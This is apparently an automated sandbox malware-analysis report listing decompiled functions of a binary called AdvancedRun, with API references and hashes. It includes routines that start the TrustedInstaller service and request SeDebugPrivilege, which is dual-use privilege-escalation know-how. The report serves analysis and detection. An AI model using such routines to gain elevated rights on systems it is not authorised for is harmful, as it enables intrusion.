                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 420 401306-40132b OpenServiceW 421 401350-40135b CloseServiceHandle 420->421 422 40132d-40133a QueryServiceStatus 420->422 423 40133c-401340 422->423 424 40134d-40134e CloseServiceHandle 422->424 423->424 425 401342-40134b StartServiceW 423->425 424->421 425->424
                                                                  C-Code - Quality: 100%
                                                                  			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                  0x00401319
                                                                  0x0040131b
                                                                  0x00401327
                                                                  0x0040132b
                                                                  0x0040133a
                                                                  0x0040134b
                                                                  0x0040134b
                                                                  0x0040134e
                                                                  0x0040134e
                                                                  0x00401353
                                                                  0x0040135b

                                                                  APIs
                                                                  • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                  • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                  • String ID: TrustedInstaller
                                                                  • API String ID: 862991418-565535830
                                                                  • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                  • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                  • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                  • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 426 409555-40955f 427 409561-40956e GetModuleHandleW 426->427 428 40958b-409592 426->428 427->428 431 409570-409586 GetProcAddress 427->431 429 409594-4095a6 GetProcessTimes 428->429 430 4095a7-4095aa 428->430 431->428
                                                                  C-Code - Quality: 100%
                                                                  			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                  0x0040955f
                                                                  0x00409566
                                                                  0x0040956e
                                                                  0x00409576
                                                                  0x00409586
                                                                  0x00409586
                                                                  0x0040956e
                                                                  0x00409592
                                                                  0x004095aa
                                                                  0x00409594
                                                                  0x004095a3
                                                                  0x004095a6
                                                                  0x004095a6

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                  • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                  • API String ID: 1714573020-3385500049
                                                                  • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                  • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                  • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                  • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 432 40a33b-40a352 FindResourceW 433 40a354-40a363 SizeofResource 432->433 434 40a3b9-40a3be 432->434 435 40a365-40a371 LoadResource 433->435 436 40a3b8 433->436 435->436 437 40a373-40a37c LockResource 435->437 436->434 437->436 438 40a37e-40a38c 437->438 439 40a3aa-40a3b3 438->439 440 40a38e 438->440 439->436 441 40a38f-40a3a7 440->441 441->441 442 40a3a9 441->442 442->439
                                                                  C-Code - Quality: 100%
                                                                  			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                  0x0040a348
                                                                  0x0040a34e
                                                                  0x0040a352
                                                                  0x0040a35f
                                                                  0x0040a363
                                                                  0x0040a369
                                                                  0x0040a371
                                                                  0x0040a374
                                                                  0x0040a37c
                                                                  0x0040a380
                                                                  0x0040a383
                                                                  0x0040a386
                                                                  0x0040a388
                                                                  0x0040a388
                                                                  0x0040a38c
                                                                  0x0040a38f
                                                                  0x0040a39f
                                                                  0x0040a3a1
                                                                  0x0040a3a5
                                                                  0x0040a3a5
                                                                  0x0040a3a9
                                                                  0x0040a3aa
                                                                  0x0040a3b3
                                                                  0x0040a3b3
                                                                  0x0040a37c
                                                                  0x0040a371
                                                                  0x0040a3b8
                                                                  0x0040a3be

                                                                  APIs
                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                  • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 3473537107-0
                                                                  • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                  • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                  • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                  • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 443 404951-404956 444 404958-404959 443->444 445 40499e-4049a1 443->445 446 40495b-404965 444->446 446->446 447 404967-404977 malloc 446->447 448 404994-40499d 447->448 449 404979-40497b 447->449 450 40498d-404993 free 449->450 451 40497d-40498a memcpy 449->451 450->448 451->450
                                                                  C-Code - Quality: 100%
                                                                  			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                  0x00404951
                                                                  0x00404952
                                                                  0x00404956
                                                                  0x004049a1
                                                                  0x00404958
                                                                  0x00404959
                                                                  0x0040495b
                                                                  0x0040495b
                                                                  0x0040495f
                                                                  0x00404961
                                                                  0x00404963
                                                                  0x0040496d
                                                                  0x00404975
                                                                  0x00404977
                                                                  0x0040497b
                                                                  0x00404985
                                                                  0x0040498a
                                                                  0x0040498e
                                                                  0x00404993
                                                                  0x0040499d
                                                                  0x0040499d

                                                                  APIs
                                                                  • malloc.MSVCRT ref: 0040496D
                                                                  • memcpy.MSVCRT ref: 00404985
                                                                  • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: freemallocmemcpy
                                                                  • String ID: W@
                                                                  • API String ID: 3056473165-1729568415
                                                                  • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                  • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                  • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                  • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 452 405436-40548d memset call 404c3c call 4047af wcscat LoadLibraryW 457 405494-405496 452->457 458 40548f-405492 LoadLibraryW 452->458 458->457
                                                                  C-Code - Quality: 100%
                                                                  			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                  0x0040543f
                                                                  0x00405456
                                                                  0x00405462
                                                                  0x00405467
                                                                  0x0040546d
                                                                  0x00405478
                                                                  0x00405489
                                                                  0x0040548d
                                                                  0x00000000
                                                                  0x00405492
                                                                  0x00405496

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                    • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                    • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                  • wcscat.MSVCRT ref: 00405478
                                                                  • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                  • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 3725422290-0
                                                                  • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                  • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                  • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                  • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 459 4054b9-4054de free * 2
                                                                  C-Code - Quality: 100%
                                                                  			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}



                                                                  0x004054bc
                                                                  0x004054c4
                                                                  0x004054cd
                                                                  0x004054cf
                                                                  0x004054d2
                                                                  0x004054d5
                                                                  0x004054d8
                                                                  0x004054db
                                                                  0x004054de

                                                                  APIs
                                                                  • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                  • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                  • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                  • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                  • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                  0x00408f4c
                                                                  0x00408f57
                                                                  0x00408f60
                                                                  0x00408f62
                                                                  0x00408f67
                                                                  0x00408f67
                                                                  0x00408f71

                                                                  APIs
                                                                    • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                    • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentErrorFreeLastLibraryProcess
                                                                  • String ID:
                                                                  • API String ID: 187924719-0
                                                                  • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                  • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                  • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                  • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 37%
                                                                  			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                  0x004098fa
                                                                  0x004098fc
                                                                  0x00409901
                                                                  0x00409907
                                                                  0x00000000
                                                                  0x0040991c
                                                                  0x00409918
                                                                  0x00000000

                                                                  APIs
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$FileModuleName
                                                                  • String ID:
                                                                  • API String ID: 3859505661-0
                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                  • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                  • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                  0x004095da
                                                                  0x004095da
                                                                  0x004095de
                                                                  0x004095e1
                                                                  0x004095e7
                                                                  0x004095e7
                                                                  0x004095ee
                                                                  0x004095fc

                                                                  APIs
                                                                  • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                  • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                  • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                  • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                  0x0040a3d0
                                                                  0x0040a3d9

                                                                  APIs
                                                                  • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: EnumNamesResource
                                                                  • String ID:
                                                                  • API String ID: 3334572018-0
                                                                  • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                  • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                  • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                  • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}





                                                                  0x004055d1
                                                                  0x004055d1
                                                                  0x004055d5
                                                                  0x004055da
                                                                  0x004055df
                                                                  0x004055e3
                                                                  0x004055e4
                                                                  0x004055e8
                                                                  0x004055eb

                                                                  APIs
                                                                  • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                  • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                  • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
